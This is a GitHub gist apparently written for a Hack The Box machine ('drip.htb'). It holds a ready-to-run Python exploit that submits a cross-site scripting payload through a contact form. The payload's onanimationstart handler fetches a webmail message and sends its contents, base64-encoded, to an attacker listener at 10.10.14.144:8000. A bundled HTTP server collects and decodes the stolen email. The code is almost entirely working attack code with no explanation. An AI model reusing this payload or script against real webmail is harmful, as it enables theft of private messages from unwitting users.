Created
February 12, 2025 06:44
-
-
Save twilightty/6125e76117cc024dae439214204c85cd to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| from http.server import BaseHTTPRequestHandler, HTTPServer | |
| import base64 | |
| import threading | |
| from lxml import html | |
| # Configuration | |
| TARGET_URL = 'http://drip.htb/contact' | |
| LISTEN_PORT = 8000 | |
| LISTEN_IP = '0.0.0.0' | |
| # Payload for the POST request | |
| start_mesg = '<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=fetch(\'/?_task=mail&_action=show&_uid=' | |
| message = 4 | |
| end_mesg = '&_mbox=INBOX&_extwin=1\').then(r=>r.text()).then(t=>fetch(`http://10.10.14.144:8000/c=${btoa(t)}`)) foo=bar">Foo</body>' | |
| post_data = { | |
| 'name': 'asdf', | |
| 'email': 'asdf', | |
| 'message': f"{start_mesg}{message}{end_mesg}", | |
| 'content': 'html', | |
| 'recipient': '[email protected]' | |
| } | |
| print(f"{start_mesg}{message}{end_mesg}") | |
| # Headers for the POST request | |
| headers = { | |
| 'Host': 'drip.htb', | |
| 'Cache-Control': 'max-age=0', | |
| 'Upgrade-Insecure-Requests': '1', | |
| 'Origin': 'http://drip.htb', | |
| 'Content-Type': 'application/x-www-form-urlencoded', | |
| 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36', | |
| 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', | |
| 'Referer': 'http://drip.htb/index', | |
| 'Accept-Encoding': 'gzip, deflate, br', | |
| 'Accept-Language': 'en-US,en;q=0.9', | |
| 'Cookie': 'session=eyJfZnJlc2giOmZhbHNlfQ.Z6fOBw.u9iWIiki2cUK55mmcizrzU5EJzE', | |
| 'Connection': 'close' | |
| } | |
| # Function to send the POST request | |
| def send_post(): | |
| response = requests.post(TARGET_URL, data=post_data, headers=headers) | |
| print(f"[+] POST Request Sent! Status Code: {response.status_code}") | |
| # Custom HTTP request handler to capture and decode the incoming data | |
| class RequestHandler(BaseHTTPRequestHandler): | |
| def do_GET(self): | |
| if '/c=' in self.path: | |
| encoded_data = self.path.split('/c=')[1] | |
| decoded_data = base64.b64decode(encoded_data).decode('latin-1') | |
| print(f"[+] Received data {decoded_data}") | |
| tree = html.fromstring(decoded_data) | |
| # XPath query to find the div with id 'messagebody' | |
| message_body = tree.xpath('//div[@id="messagebody"]') | |
| # Check if the div exists and extract the content | |
| if message_body: | |
| # Extract inner text, preserving line breaks | |
| message_text = message_body[0].text_content().strip() | |
| print("[+] Extracted Message Body Content:\n") | |
| print(message_text) | |
| else: | |
| print("[!] No div with id 'messagebody' found.") | |
| else: | |
| print("[!] Received request but no data found.") | |
| self.send_response(200) | |
| self.end_headers() | |
| self.wfile.write(b'OK') | |
| def log_message(self, format, *args): | |
| return # Suppress default logging | |
| # Function to start the HTTP server | |
| def start_server(): | |
| server_address = (LISTEN_IP, LISTEN_PORT) | |
| httpd = HTTPServer(server_address, RequestHandler) | |
| print(f"[+] Listening on port {LISTEN_PORT} for exfiltrated data...") | |
| httpd.serve_forever() | |
| # Run the HTTP server in a separate thread | |
| server_thread = threading.Thread(target=start_server) | |
| server_thread.daemon = True | |
| server_thread.start() | |
| # Send the POST request | |
| send_post() | |
| # Keep the main thread alive to continue listening | |
| try: | |
| while True: | |
| pass | |
| except KeyboardInterrupt: | |
| print("\n[+] Stopping server.") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment